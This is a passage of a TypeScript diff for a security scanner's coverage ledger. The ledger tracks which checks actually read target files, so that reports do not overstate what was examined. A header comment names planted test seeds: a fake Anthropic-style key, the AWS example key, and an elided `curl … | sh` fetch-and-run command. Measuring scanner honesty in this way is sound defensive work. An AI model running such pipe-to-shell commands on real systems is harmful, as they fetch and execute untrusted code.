+  checkSecretManagement: ['SEC'],
+  checkPromptSecurity: ['PROMPT'],
+  checkInputValidation: ['INJ'],
+  checkRateLimiting: ['RATE'],
+  checkSessionSecurity: ['SESSION'],
+  checkEncryption: ['ENCRYPT'],
+  checkAuditTrail: ['AUDIT'],
+  checkSandboxing: ['SANDBOX'],
+  checkToolBoundaries: ['TOOL'],
+  checkOpenclawSkills: ['SKILL', 'HEARTBEAT', 'SCAN'],
+  checkOpenclawHeartbeat: ['HEARTBEAT', 'SCAN'],
+  checkOpenclawGateway: ['GATEWAY', 'SCAN'],
+  checkOpenclawConfig: ['CONFIG', 'SCAN'],
+  checkOpenclawSupplyChain: ['SUPPLY', 'SCAN'],
+  checkOpenclawCVE: ['CVE'],
+  checkUnicodeSteganography: ['UNICODE-STEGO'],
+  checkMemoryPoisoning: ['MEM'],
+  checkRAGPoisoning: ['RAG'],
+  checkAgentIdentity: ['AIM'],
+  checkAgentDNA: ['DNA'],
+  checkSkillMemory: ['SKILL-MEM'],
+  checkNemoClawPatterns: ['NEMO'],
+  checkLLMExposure: ['LLM'],
+  checkAIToolExposure: ['AITOOL'],
+  checkA2AExposure: ['A2A'],
+  checkMCPDiscovery: ['MCP'],
+  checkWebServedCredentials: ['WEBCRED'],
+  checkInstallScripts: ['INSTALL'],
+  checkCLICredentialPassthrough: ['CLIPASS'],
+  checkIntegrityBypass: ['INTEGRITY'],
+  checkTOCTOU: ['TOCTOU'],
+  checkDockerInjection: ['DOCKERINJ'],
+  checkSandboxMessaging: ['SANDBOX'],
+  checkWebExposedFiles: ['WEBEXPOSE'],
+  checkSoulOverride: ['SOUL-OVERRIDE'],
+  checkSoulGovernanceGaps: ['SOUL'],
+  checkMemoryStoreSanitization: ['MEM'],
+  checkAgentCredentialProtection: ['AGENT-CRED'],
+  checkContextLifecycle: ['LIFECYCLE'],
+};
+
+/**
+ * Check-ID prefixes whose implementation exists but has no caller.
+ *
+ * `checkCodeInjection` (`CODEINJ-001`), `checkTmpPaths` (`TMPPATH-001`) and
+ * `checkEnvLeak` (`ENVLEAK-001`) are defined in `scanner.ts` and emit
+ * findings, but `grep -n 'this.checkCodeInjection('` and its two siblings
+ * return NOTHING — the scan orchestration never calls them. Their three IDs
+ * are nonetheless counted in the `310 static` the Observations block
+ * advertises, so the advertised suite is 3 checks larger than the suite that
+ * can fire.
+ *
+ * They are listed here rather than silently omitted so the `--json` inventory
+ * can name them as unreachable instead of leaving the reader to infer it from
+ * an absence. Wiring them in is a DETECTION change with its own FP surface and
+ * belongs to its own unit, not to this one.
+ */
+export const UNREACHABLE_PREFIXES: readonly string[] = ['CODEINJ', 'TMPPATH', 'ENVLEAK'];
+
+/**
+ * Check-ID prefixes the NanoMind semantic layer can emit.
+ *
+ * The semantic pass is not a `check*` method — it runs in the scanner bridge
+ * over the artifacts it compiled — so its evidence enters the rollup through
+ * `SummarizeOptions.semantic` rather than through an execution record. This
+ * list is what that evidence is credited to.
+ *
+ * Derived from the emission sites, not from `TAXONOMY_MAP`: the taxonomy holds
+ * only 14 semantic IDs while the analyzers emit 15 distinct families, so
+ * taking the taxonomy as the source would have silently dropped AST-CAP,
+ * AST-CODE, AST-CRED, AST-GOV, AST-HEARTBEAT, AST-INJECT, AST-MANIP,
+ * AST-PERSIST and AST-PROMPT from the coverage claim. The registration test
+ * re-derives this list from `src/nanomind-core/` and `src/semantic/` and fails
+ * on drift.
+ */
+export const SEMANTIC_PREFIXES: readonly string[] = [
+  'AST-CAP', 'AST-CODE', 'AST-CRED', 'AST-EXFIL', 'AST-GOV', 'AST-HEARTBEAT',
+  'AST-INJECT', 'AST-MANIP', 'AST-PERSIST', 'AST-PROMPT', 'AST-SCOPE',
+  'SEM-CRED', 'SEM-INST', 'SEM-MCP', 'SEM-PERM',
+];
+
+/**
+ * Category label for a check-ID prefix.
+ *
+ * Mirrors `CATEGORY_MAP` in `@opena2a/cli-ui`'s observations renderer so the
+ * ledger speaks the same vocabulary the Categories line prints. Kept in step
+ * by `__tests__/hardening/coverage-honesty.test.ts`, which
+ * imports `ALL_CATEGORY_LABELS` from the renderer and asserts every label
+ * this table produces is one the renderer knows.
+ */
+const PREFIX_TO_CATEGORY: Readonly<Record<string, string>> = {
+  CRED: 'credentials', 'AST-CRED': 'credentials', WEBCRED: 'credentials',
+  'SEM-CRED': 'credentials', 'AGENT-CRED': 'credentials', ENVLEAK: 'credentials',
+  CLIPASS: 'credentials',
+  MCP: 'MCP', 'AST-MCP': 'MCP', 'SEM-MCP': 'MCP',
+  NET: 'network', GATEWAY: 'network', WEBEXPOSE: 'network',
+  // `AST-EXFIL` is egress, so it is credited to network. It, `AST-INJECT`,
+  // `AST-MANIP` and `AST-PERSIST` are absent from the renderer's own
+  // CATEGORY_MAP, so a FINDING carrying one of them displays under "other"
+  // while its COVERAGE is credited here. Those are different questions —
+  // where a finding is filed, and whether the category was looked at — and
+  // leaving these unmapped would understate coverage the semantic layer
+  // genuinely performed.
+  'AST-EXFIL': 'network',
+  INJ: 'injection', IO: 'injection', CODEINJ: 'injection', DOCKERINJ: 'injection',
+  'AST-INJECT': 'injection',
+  PROMPT: 'prompt', 'AST-PROMPT': 'prompt', 'SEM-INST': 'prompt',
+  'AST-MANIP': 'prompt',
+  'AST-PERSIST': 'sandbox',
+  ENCRYPT: 'encryption',
+  SESSION: 'session',
+  SANDBOX: 'sandbox', PROC: 'sandbox', PERM: 'sandbox', 'SEM-PERM': 'sandbox',
+  TMPPATH: 'sandbox', TOCTOU: 'sandbox', 'AST-CODE': 'sandbox',
+  'AST-CAP': 'capabilities', 'AST-SCOPE': 'capabilities',
+  SUPPLY: 'supply-chain', DEP: 'supply-chain', INSTALL: 'supply-chain',
+  INTEGRITY: 'supply-chain',
+  'AST-GOV': 'governance', 'AST-GOVERN': 'governance', SOUL: 'governance',
+  GOV: 'governance', 'SOUL-OVERRIDE': 'governance',
+  SKILL: 'skill', 'SKILL-MEM': 'skill',
+  'UNICODE-STEGO': 'unicode-stego', STEGO: 'unicode-stego',
+  MEM: 'memory', RAG: 'memory',
+  AIM: 'identity', 'AST-AIM': 'identity', DNA: 'identity',
+  NEMO: 'sandbox-escape',
+  CVE: 'CVE',
+  A2A: 'A2A',
+  LIFECYCLE: 'lifecycle',
+  LLM: 'LLM risk',
+  HEARTBEAT: 'heartbeat', 'AST-HEARTBEAT': 'heartbeat',
+  CONFIG: 'config', ENV: 'config', VSCODE: 'config', CURSOR: 'config',
+  CLAUDE: 'config', SEC: 'config',
+  AUDIT: 'audit', LOG: 'audit', RATE: 'audit', SCAN: 'audit', CHK: 'audit',
+  'CHK-FAIL': 'audit',
+  AUTH: 'auth', TOOL: 'auth', API: 'auth', AITOOL: 'auth',
+  GIT: 'git hygiene',
+};
+
+/** Category label for a check-ID prefix, or null when unmapped. */
+export function categoryForPrefix(prefix: string): string | null {
+  return PREFIX_TO_CATEGORY[prefix] ?? null;
+}
+
+/**
+ * Category label for a full check ID (`SOUL-OVERRIDE-001` -> `governance`).
+ *
+ * Longest prefix wins, so `SOUL-OVERRIDE-001` is not filed under `SOUL`
+ * because that also matches. Exported so callers and tests resolve IDs
+ * through this one implementation rather than each re-deriving the rule.
+ */
+export function categoryForCheckId(checkId: string): string | null {
+  const id = (checkId || '').toUpperCase();
+  const prefix = Object.keys(PREFIX_TO_CATEGORY)
+    .filter(p => id === p || id.startsWith(p + '-'))
+    .sort((a, b) => b.length - a.length)[0];
+  return prefix ? PREFIX_TO_CATEGORY[prefix] : null;
+}
+
+/**
+ * Records what a single scan actually examined.
+ *
+ * One ledger per `scan()` call. The scanner installs it as the active ledger
+ * for the duration of the run, so the tracked `fs` namespace can attribute
+ * reads to whichever check is on the stack.
+ */
+export class CoverageLedger {
+  /** Absolute, resolved target root. Reads outside it are not evidence. */
+  private readonly targetRoot: string;
+  private readonly executions = new Map<string, CheckExecution>();
+  private readonly truncations: CoverageTruncation[] = [];
+  /** Stack of running methods — the innermost gets the attribution. */
+  private readonly stack: string[] = [];
+  /** Distinct target paths whose contents were read, across the whole scan. */
+  private readonly filesReadAll = new Set<string>();
+  /** Per-method distinct path sets, so two reads of one file count once. */
+  private readonly readsByMethod = new Map<string, Set<string>>();
+  private readonly inspectedByMethod = new Map<string, Set<string>>();
+
+  constructor(targetRoot: string) {
+    this.targetRoot = path.resolve(targetRoot);
+  }
+
+  /** Total distinct files inside the target whose contents the scan read. */
+  get filesExamined(): number {
+    return this.filesReadAll.size;
+  }
+
+  /**
+   * Run `fn` attributed to `method`.
+   *
+   * Registration is by method name; the prefixes come from
+   * `CHECK_METHOD_PREFIXES`. An unregistered method still records its
+   * evidence, but with no prefixes that evidence reaches no category — the
+   * fail-closed direction.
+   */
+  async run<T>(method: string, fn: () => Promise<T>): Promise<T> {
+    const rec = this.ensure(method);
+    this.stack.push(method);
+    try {
+      const out = await fn();
+      rec.completed = true;
+      return out;
+    } catch (err) {
+      // A method that threw cannot vouch for what it did or did not cover.
+      // `completed` stays false, so its category degrades to not-examined
+      // unless another method in the same category supplies evidence.
+      rec.error = err instanceof Error ? err.message : String(err);
+      throw err;
+    } finally {
+      this.stack.pop();
+      rec.filesRead = this.readsByMethod.get(method)?.size ?? 0;
+      rec.pathsInspected = this.inspectedByMethod.get(method)?.size ?? 0;
+    }
+  }
+
+  /** Record that the orchestration skipped a method outright, and why. */
+  skip(method: string, reason: string): void {
+    const rec = this.ensure(method);
+    rec.skipReason = reason;
+  }
+
+  /**
+   * Mark every registered method with no execution record as skipped.
+   *
+   * Used by the quick-depth branch, where 55 of the 61 orchestrated checks
+   * sit inside one `if (!isQuick)` block. Deriving the set from "has no record
+   * yet" rather than from a hand-written list is deliberate: a list would
+   * drift the moment a check is added to or moved out of that block, and a
+   * drifted list would report a check as run when it was not — the same class
+   * of false claim this ledger exists to remove.
+   *
+   * Call AFTER the depth-gated block, so checks that did run keep their
+   * records.
+   */
+  skipUnrun(reason: string): void {
+    for (const method of Object.keys(CHECK_METHOD_PREFIXES)) {
+      if (this.executions.has(method)) continue;
+      this.skip(method, reason);
+    }
+  }
+
+  /** Record a cap that stopped a layer short of the whole tree. */
+  truncate(t: CoverageTruncation): void {
+    this.truncations.push(t);
+  }
+
+  /**
+   * Attribute a content read. Called by the tracked `fs` namespace.
+   *
+   * Only paths inside the target root count: a check reading HMA's own model
+   * files or the user's `~/.claude` is not evidence that it examined the
+   * thing being scanned.
+   */
+  noteRead(target: string): void {
+    this.note(target, this.readsByMethod, true);
+  }
+
+  /** Attribute a stat/readdir-style inspection (no content read). */
+  noteInspect(target: string): void {
+    this.note(target, this.inspectedByMethod, false);
+  }
+
+  private note(target: string, into: Map<string, Set<string>>, isRead: boolean): void {
+    const method = this.stack[this.stack.length - 1];
+    if (!method) return; // outside any registered check — not attributable
+    let resolved: string;
+    try {
+      resolved = path.resolve(target);
+    } catch {
+      return;
+    }
+    if (!this.isInsideTarget(resolved)) return;
+    let set = into.get(method);
+    if (!set) {
+      set = new Set<string>();
+      into.set(method, set);
+    }
+    set.add(resolved);
+    if (isRead) this.filesReadAll.add(resolved);
+  }
+
+  private isInsideTarget(resolved: string): boolean {
+    if (resolved === this.targetRoot) return true;
+    // Compare on a separator boundary so `/a/bc` is not read as inside `/a/b`.
+    return resolved.startsWith(this.targetRoot + path.sep);
+  }
+
+  private ensure(method: string): CheckExecution {
+    let rec = this.executions.get(method);
+    if (!rec) {
+      rec = {
+        method,
+        prefixes: [...(CHECK_METHOD_PREFIXES[method] ?? [])],
+        completed: false,
+        filesRead: 0,
+        pathsInspected: 0,
+      };
+      this.executions.set(method, rec);
+    }
+    return rec;
+  }
+
+  /** Every registered execution record, for the `--json` inventory. */
+  get records(): CheckExecution[] {
+    return [...this.executions.values()];
+  }
+
+  /** Every cap that fired, for the `--json` inventory. */
+  get caps(): CoverageTruncation[] {
+    return [...this.truncations];
+  }
+
+  /**
+   * Roll the raw records up into per-category states.
+   *
+   * `semanticPrefixes` carries the AST/SEM layer's evidence, which is
+   * collected by the NanoMind bridge rather than by a `check*` method: the
+   * layer reports how many artifacts it compiled and whether its cap fired.
+   */
+  summarize(opts?: SummarizeOptions): CategoryCoverage[] {
+    return summarizeCoverage(this.records, this.caps, opts);
+  }
+}
+
+/** Extra evidence from layers that are not `check*` methods. */
+export interface SummarizeOptions {
+  /** Prefixes the semantic layer examined, with its compiled-artifact count. */
+  semantic?: { prefixes: string[]; artifactsCompiled: number };
+  /**
+   * Check IDs of findings this scan actually reported.
+   *
+   * A finding is the strongest evidence there is: the check ran, looked at
+   * this target, and had something to say. Needed because some checks assert
+   * on ABSENCE — `checkGitSecurity` reports `GIT-001` for a missing
+   * `.gitignore` without reading a single byte, so a read-count rule alone
+   * filed `git hygiene` as never examined while the same output listed a
+   * `git hygiene` finding. Two lines of one report contradicting each other
+   * is the defect this ledger exists to remove, so findings are counted.
+   */
+  observedCheckIds?: readonly string[];
+}
+
+/**
+ * Roll execution records up into per-category states.
+ *
+ * Pure, and exported separately from the ledger class so the renderer and the
+ * tests can run it over a serialized `ScanResult.coverage` — the same code
+ * path the CLI uses, rather than a second implementation that could disagree
+ * with it.
+ */
+export function summarizeCoverage(
+  executions: readonly CheckExecution[],
+  truncations: readonly CoverageTruncation[],
+  opts?: SummarizeOptions,
+): CategoryCoverage[] {
+  const byCategory = new Map<string, CategoryCoverage>();
+  const byMethod = new Map(executions.map(e => [e.method, e]));
+
+  const bucket = (category: string): CategoryCoverage => {
+    let c = byCategory.get(category);
+    if (!c) {
+      c = { category, state: 'not-examined', methods: [], filesRead: 0 };
+      byCategory.set(category, c);
+    }
+    return c;
+  };
+
+  // Seed every category the ledger can speak about, all closed.
+  for (const prefix of Object.keys(PREFIX_TO_CATEGORY)) {
+    bucket(PREFIX_TO_CATEGORY[prefix]);
+  }
+
+  // Positive evidence only, and the evidence is a CONTENT read: the method
+  // completed and read at least one file inside the target.
+  //
+  // `pathsInspected` (stat/readdir) deliberately does NOT establish coverage
+  // on its own. A check that listed a directory, found no file of its kind and
+  // read nothing has examined no content, and reporting that as `examined`
+  // reproduces the defect one level down — measured on a 529-file repo, six
+  // categories qualified on inspections alone while reading zero files, and
+  // "examined, 0 files" is not a claim that survives being read aloud. Those
+  // categories now report `not examined` with the surface named as the reason.
+  //
+  // The cost is understatement for an inspection-only check (file permissions
+  // is examined by `stat`, not by reading). Understating is the only safe
+  // direction for a coverage claim, so it is the one taken. `pathsInspected`
+  // stays in the `--json` record, where it informs without asserting.
+  for (const rec of executions) {
+    if (!rec.completed || rec.filesRead === 0) continue;
+    for (const prefix of rec.prefixes) {
+      const category = PREFIX_TO_CATEGORY[prefix];
+      if (!category) continue;
+      const c = bucket(category);
+      c.state = 'examined';
+      c.methods.push(rec.method);
+      c.filesRead += rec.filesRead;
+    }
+  }
+
+  // A reported finding proves its category was examined, whatever the read
+  // count says. Applied before the cap pass below, so a finding upgrades a
+  // closed category to `examined` and the cap can still downgrade it to
+  // `truncated` — a category that produced a finding under a capped layer is
+  // still only partly covered.
+  for (const checkId of opts?.observedCheckIds ?? []) {
+    const category = categoryForCheckId(checkId);
+    if (!category) continue;
+    const c = bucket(category);
+    if (c.state === 'not-examined') {
+      c.state = 'examined';
+      if (!c.methods.includes('reported-finding')) c.methods.push('reported-finding');
+    }
+  }
+
+  if (opts?.semantic && opts.semantic.artifactsCompiled > 0) {
+    for (const prefix of opts.semantic.prefixes) {
+      const category = PREFIX_TO_CATEGORY[prefix];
+      if (!category) continue;
+      const c = bucket(category);
+      c.state = 'examined';
+      c.methods.push('nanomind-semantic');
+      c.filesRead += opts.semantic.artifactsCompiled;
+    }
+  }
+
+  // A cap downgrades an examined category to truncated: the checks ran, but a
+  // clear result only covers the part of the tree they reached.
+  for (const t of truncations) {
+    for (const prefix of t.prefixes) {
+      const category = PREFIX_TO_CATEGORY[prefix];
+      if (!category) continue;
+      const c = bucket(category);
+      if (c.state === 'examined') {
+        c.state = 'truncated';
+        c.reason = t.reason;
+      }
+    }
+  }
+
+  // Reasons for everything still closed.
+  for (const c of byCategory.values()) {
+    if (c.state !== 'not-examined') continue;
+    const methods = methodsForCategory(c.category);
+    const skipped = methods.map(m => byMethod.get(m)).filter(r => r?.skipReason);
+    const unreachable = UNREACHABLE_PREFIXES.some(
+      p => PREFIX_TO_CATEGORY[p] === c.category,
+    ) && methods.length === 0;
+    if (skipped.length > 0) {
+      c.reason = skipped[0]!.skipReason;
+    } else if (unreachable) {
+      c.reason = 'the check for this category has no caller in the scan (unreachable)';
+    } else if (methods.length === 0) {
+      c.reason = 'no check in this category ran';
+    } else {
+      c.reason = 'checks ran but found no file of this kind in the target';
+    }
+  }
+
+  return [...byCategory.values()].sort((a, b) => a.category.localeCompare(b.category));
+}
+
+/** Registered method names whose prefixes map to `category`. */
+function methodsForCategory(category: string): string[] {
+  const out: string[] = [];
+  for (const [method, prefixes] of Object.entries(CHECK_METHOD_PREFIXES)) {
+    if (prefixes.some(p => PREFIX_TO_CATEGORY[p] === category)) out.push(method);
+  }
+  return out;
+}
+
+// ---------------------------------------------------------------------------
+// Active-ledger plumbing
+// ---------------------------------------------------------------------------
+
+/**
+ * The ledger currently collecting evidence.
+ *
+ * Module-scoped because the tracked `fs` namespace is module-scoped: wrapping
+ * the namespace once is what lets all 153 read sites be attributed without
+ * touching any of them. Set and cleared by `withActiveLedger` around a scan.
+ *
+ * Nested scans (the verify pass inside `--fix` constructs its own scanner)
+ * save and restore, so the inner run's reads are attributed to the inner
+ * ledger and the outer one resumes intact.
+ */
+let activeLedger: CoverageLedger | null = null;
+
+/** Run `fn` with `ledger` collecting evidence, restoring any prior ledger. */
+export async function withActiveLedger<T>(
+  ledger: CoverageLedger,
+  fn: () => Promise<T>,
+): Promise<T> {
+  const previous = activeLedger;
+  activeLedger = ledger;
+  try {
+    return await fn();
+  } finally {
+    activeLedger = previous;
+  }
+}
+
+/** Report a content read to the active ledger, if any. */
+export function noteRead(target: unknown): void {
+  if (!activeLedger) return;
+  if (typeof target !== 'string') return; // fd / URL / Buffer — not attributable
+  activeLedger.noteRead(target);
+}
+
+/** Report a stat/readdir-style inspection to the active ledger, if any. */
+export function noteInspect(target: unknown): void {
+  if (!activeLedger) return;
+  if (typeof target !== 'string') return;
+  activeLedger.noteInspect(target);
+}
+
+/** Test seam: the ledger currently installed, or null. */
+export function currentLedger(): CoverageLedger | null {
+  return activeLedger;
+}

--- a/src/hardening/coverage-ledger.ts
+++ b/src/hardening/coverage-ledger.ts
@@ -10,7 +10,7 @@
  *   Categories  credentials, MCP, network, injection, ... + 16 more  (all clear)
  *   Verdict     No security issues detected. This library looks safe to use.
  *
- * Measured on a 528-file copy of a real repo carrying a planted
+ * Measured on a 529-file copy of a real repo carrying a planted
  * `sk-ant-api03-...` key, an `AKIAIOSFODNN7EXAMPLE`, and a
  * `curl … | sh`: byte-identical output, `100/100`. That is not a missed
  * detection — it is a false assurance line, and it is worse than silence
@@ -58,6 +58,7 @@ export interface CheckExecution {
   completed: boolean;
   /** Distinct paths inside the target this method read the CONTENTS of. */
   filesRead: number;
+
   /** Distinct paths inside the target it inspected without reading (stat/readdir). */
   pathsInspected: number;
   /** Set when the orchestration skipped the method outright. */
@@ -89,6 +90,16 @@ export interface CategoryCoverage {
   filesRead: number;
   /** Why it is `not-examined` / `truncated`. Empty when `examined`. */
   reason?: string;
+  /**
+   * True only when the checks were OBSERVED to look and find nothing — they
+   * inspected paths inside the target and no file of their kind was there.
+   *
+   * A consumer may treat this as benign; every other `not-examined` category
+   * is a coverage GAP. The distinction is carried as a flag rather than left
+   * for the caller to recover by matching on `reason`, so a reworded sentence
+   * cannot silently reclassify a gap as an absence.
+   */
+  observedAbsent?: boolean;
 }
 
 /**
@@ -99,9 +110,9 @@ export interface CategoryCoverage {
  * measured. A wrong entry here mis-files evidence; it cannot manufacture it.
  *
  * `__tests__/hardening/coverage-honesty.test.ts` holds this
- * honest in two directions: every prefix named here must exist in
- * `TAXONOMY_MAP`, and every `check*` method reached by the orchestration must
- * appear here. A method added without a registration fails that test rather
+ * honest in two directions: every prefix named here must map to a category
+ * the renderer knows, and every `check*` method reached by the orchestration
+ * must appear here. A method added without a registration fails that test rather
  * than silently reporting its category as never examined.
  */
 export const CHECK_METHOD_PREFIXES: Readonly<Record<string, readonly string[]>> = {
@@ -191,16 +202,14 @@ export const UNREACHABLE_PREFIXES: readonly string[] = ['CODEINJ', 'TMPPATH', 'E
  *
  * The semantic pass is not a `check*` method — it runs in the scanner bridge
  * over the artifacts it compiled — so its evidence enters the rollup through
- * `SummarizeOptions.semantic` rather than through an execution record. This
- * list is what that evidence is credited to.
+ * `SummarizeOptions.semantic` rather than through an execution record.
  *
  * Derived from the emission sites, not from `TAXONOMY_MAP`: the taxonomy holds
- * only 14 semantic IDs while the analyzers emit 15 distinct families, so
- * taking the taxonomy as the source would have silently dropped AST-CAP,
- * AST-CODE, AST-CRED, AST-GOV, AST-HEARTBEAT, AST-INJECT, AST-MANIP,
- * AST-PERSIST and AST-PROMPT from the coverage claim. The registration test
- * re-derives this list from `src/nanomind-core/` and `src/semantic/` and fails
- * on drift.
+ * 13 semantic IDs while the analyzers emit 15 distinct families, so taking the
+ * taxonomy as the source would silently drop AST-CAP, AST-CODE, AST-CRED,
+ * AST-GOV, AST-HEARTBEAT, AST-INJECT, AST-MANIP, AST-PERSIST, AST-PROMPT and
+ * SEM-MCP from the coverage claim. `coverage-honesty.test.ts` re-derives this
+ * list from `src/nanomind-core/` and `src/semantic/` and fails on drift.
  */
 export const SEMANTIC_PREFIXES: readonly string[] = [
   'AST-CAP', 'AST-CODE', 'AST-CRED', 'AST-EXFIL', 'AST-GOV', 'AST-HEARTBEAT',
@@ -209,13 +218,54 @@ export const SEMANTIC_PREFIXES: readonly string[] = [
 ];
 
 /**
+ * Which categories a COMPILED ARTIFACT of each type is evidence for.
+ *
+ * The semantic layer used to credit all 15 families above from a single
+ * boolean — `artifactsCompiled > 0`. That is a claim read off a hand-written
+ * list, which is the very thing this module exists to stop: on a repo with no
+ * MCP config at all, four MCP checks each read nothing and the category still
+ * reported `examined`, sourced only to `nanomind-semantic`.
+ *
+ * So the credit is now measured from the artifact TYPES the run actually
+ * compiled. Source files carry the analyzers that read any code; an
+ * artifact-specific category (MCP, skill, governance, A2A) is credited only
+ * when an artifact of that kind was really compiled. An unknown type credits
+ * nothing, which is the fail-closed direction.
+ */
+const ARTIFACT_TYPE_CATEGORIES: Readonly<Record<string, readonly string[]>> = {
+  // Source code is what the generic AST analyzers read.
+  source_code: ['credentials', 'injection', 'prompt', 'capabilities', 'sandbox', 'network'],
+  // Artifact-specific surfaces: present only if such an artifact was compiled.
+  mcp_config: ['MCP', 'capabilities'],
+  skill: ['skill', 'capabilities', 'prompt'],
+  soul: ['governance', 'prompt'],
+  agent_config: ['governance', 'capabilities'],
+  system_prompt: ['prompt', 'governance'],
+  a2a_card: ['A2A', 'identity'],
+  heartbeat: ['heartbeat'],
+};
+
+/** Categories the compiled artifact types are evidence for. Measured input. */
+export function categoriesForArtifactTypes(types: readonly string[]): string[] {
+  const out = new Set<string>();
+  // Fail closed on a malformed caller: credit nothing rather than throw, so a
+  // bad input can never be the reason a coverage claim is missing OR inflated.
+  if (!Array.isArray(types)) return [];
+  for (const t of types) {
+    for (const c of ARTIFACT_TYPE_CATEGORIES[t] ?? []) out.add(c);
+  }
+  return [...out];
+}
+
+/**
  * Category label for a check-ID prefix.
  *
  * Mirrors `CATEGORY_MAP` in `@opena2a/cli-ui`'s observations renderer so the
  * ledger speaks the same vocabulary the Categories line prints. Kept in step
- * by `__tests__/hardening/coverage-honesty.test.ts`, which
- * imports `ALL_CATEGORY_LABELS` from the renderer and asserts every label
- * this table produces is one the renderer knows.
+ * by `__tests__/hardening/coverage-honesty.test.ts`, which imports
+ * `ALL_CATEGORY_LABELS` from the renderer and asserts the two vocabularies
+ * match in BOTH directions — a rename on either side silently deletes a
+ * category from the report, and nothing else would signal it.
  */
 const PREFIX_TO_CATEGORY: Readonly<Record<string, string>> = {
   CRED: 'credentials', 'AST-CRED': 'credentials', WEBCRED: 'credentials',
@@ -262,6 +312,9 @@ const PREFIX_TO_CATEGORY: Readonly<Record<string, string>> = {
   AUTH: 'auth', TOOL: 'auth', API: 'auth', AITOOL: 'auth',
   GIT: 'git hygiene',
 };
+
+/** Every category label the ledger can speak about. */
+const ALL_CATEGORIES = new Set(Object.values(PREFIX_TO_CATEGORY));
 
 /** Category label for a check-ID prefix, or null when unmapped. */
 export function categoryForPrefix(prefix: string): string | null {
@@ -438,6 +491,32 @@ export class CoverageLedger {
   }
 
   /**
+   * Distinct files read per category, computed from the ledger's own path
+   * sets so a file two checks both read counts once.
+   *
+   * Returns COUNTS, never paths. The paths stay inside this object: a scan of
+   * a single file normalises its target into a temp directory, and emitting
+   * the read list put that directory's generated name into `--json` — the
+   * exact leak `secure-single-file-normalization` exists to prevent. A count
+   * carries the coverage information without carrying the filenames.
+   */
+  categoryFileCounts(): Record<string, number> {
+    const byCategory = new Map<string, Set<string>>();
+    for (const [method, paths] of this.readsByMethod) {
+      for (const prefix of CHECK_METHOD_PREFIXES[method] ?? []) {
+        const category = PREFIX_TO_CATEGORY[prefix];
+        if (!category) continue;
+        let set = byCategory.get(category);
+        if (!set) { set = new Set<string>(); byCategory.set(category, set); }
+        for (const p of paths) set.add(p);
+      }
+    }
+    const out: Record<string, number> = {};
+    for (const [category, set] of byCategory) out[category] = set.size;
+    return out;
+  }
+
+  /**
    * Roll the raw records up into per-category states.
    *
    * `semanticPrefixes` carries the AST/SEM layer's evidence, which is
@@ -451,8 +530,12 @@ export class CoverageLedger {
 
 /** Extra evidence from layers that are not `check*` methods. */
 export interface SummarizeOptions {
-  /** Prefixes the semantic layer examined, with its compiled-artifact count. */
-  semantic?: { prefixes: string[]; artifactsCompiled: number };
+  /**
+   * What the semantic layer compiled: the artifact TYPES it produced, and how
+   * many artifacts. Types are measured per run; the count alone is not
+   * evidence about any particular category.
+   */
+  semantic?: { artifactTypes: string[]; artifactsCompiled: number };
   /**
    * Check IDs of findings this scan actually reported.
    *
@@ -465,6 +548,14 @@ export interface SummarizeOptions {
    * is the defect this ledger exists to remove, so findings are counted.
    */
   observedCheckIds?: readonly string[];
+  /**
+   * Distinct files read per category, from `CoverageLedger.categoryFileCounts()`.
+   *
+   * Supplied instead of per-record path lists so no filename ever reaches a
+   * serialized surface. Absent, `filesRead` falls back to the largest single
+   * method's count, which under-reports rather than over-reports.
+   */
+  filesReadByCategory?: Readonly<Record<string, number>>;
 }
 
 /**
@@ -512,6 +603,11 @@ export function summarizeCoverage(
   // is examined by `stat`, not by reading). Understating is the only safe
   // direction for a coverage claim, so it is the one taken. `pathsInspected`
   // stays in the `--json` record, where it informs without asserting.
+  // Per-category totals come from the ledger's distinct counts. Summing the
+  // per-method `filesRead` instead double-counts every file two checks both
+  // read, and produced category totals larger than the whole tree.
+  const distinct = opts?.filesReadByCategory;
+  const fallback = new Map<string, number>();
   for (const rec of executions) {
     if (!rec.completed || rec.filesRead === 0) continue;
     for (const prefix of rec.prefixes) {
@@ -520,8 +616,12 @@ export function summarizeCoverage(
       const c = bucket(category);
       c.state = 'examined';
       c.methods.push(rec.method);
-      c.filesRead += rec.filesRead;
+      fallback.set(category, Math.max(fallback.get(category) ?? 0, rec.filesRead));
     }
+  }
+  for (const c of byCategory.values()) {
+    if (c.state !== 'examined') continue;
+    c.filesRead = distinct?.[c.category] ?? fallback.get(c.category) ?? 0;
   }
 
   // A reported finding proves its category was examined, whatever the read
@@ -540,13 +640,14 @@ export function summarizeCoverage(
   }
 
   if (opts?.semantic && opts.semantic.artifactsCompiled > 0) {
-    for (const prefix of opts.semantic.prefixes) {
-      const category = PREFIX_TO_CATEGORY[prefix];
-      if (!category) continue;
+    for (const category of categoriesForArtifactTypes(opts.semantic.artifactTypes)) {
+      if (!byCategory.has(category) && !ALL_CATEGORIES.has(category)) continue;
       const c = bucket(category);
       c.state = 'examined';
-      c.methods.push('nanomind-semantic');
-      c.filesRead += opts.semantic.artifactsCompiled;
+      if (!c.methods.includes('nanomind-semantic')) c.methods.push('nanomind-semantic');
+      // Not summed into filesRead: the compiled artifacts are the same files
+      // the static checks already counted, and adding them again is what made
+      // a per-category total exceed the size of the tree.
     }
   }
 
@@ -568,18 +669,25 @@ export function summarizeCoverage(
   for (const c of byCategory.values()) {
     if (c.state !== 'not-examined') continue;
     const methods = methodsForCategory(c.category);
-    const skipped = methods.map(m => byMethod.get(m)).filter(r => r?.skipReason);
-    const unreachable = UNREACHABLE_PREFIXES.some(
-      p => PREFIX_TO_CATEGORY[p] === c.category,
-    ) && methods.length === 0;
+    const records = methods.map(m => byMethod.get(m));
+    const skipped = records.filter(r => r?.skipReason);
     if (skipped.length > 0) {
       c.reason = skipped[0]!.skipReason;
-    } else if (unreachable) {
-      c.reason = 'the check for this category has no caller in the scan (unreachable)';
     } else if (methods.length === 0) {
       c.reason = 'no check in this category ran';
+    } else if (records.some(r => r?.completed && r.pathsInspected > 0)) {
+      c.observedAbsent = true;
+      // The checks looked — they stat'd or listed paths inside the target —
+      // and found no file of their kind. That is a genuine absence.
+      c.reason = 'checks ran and found no file of this kind in the target';
     } else {
-      c.reason = 'checks ran but found no file of this kind in the target';
+      // Nothing was read AND nothing was even inspected, so there is no
+      // evidence these checks touched the target at all. Reporting that as
+      // "no such surface here" would convert an instrumentation hole into
+      // reassurance: `checkContextLifecycle` delegates to a module that reads
+      // through an untracked `fs`, so it read 177 files and recorded none.
+      // Absence has to be observed, not inferred from silence.
+      c.reason = 'no evidence these checks inspected the target';
     }
   }
 

--- a/src/hardening/coverage-ledger.ts
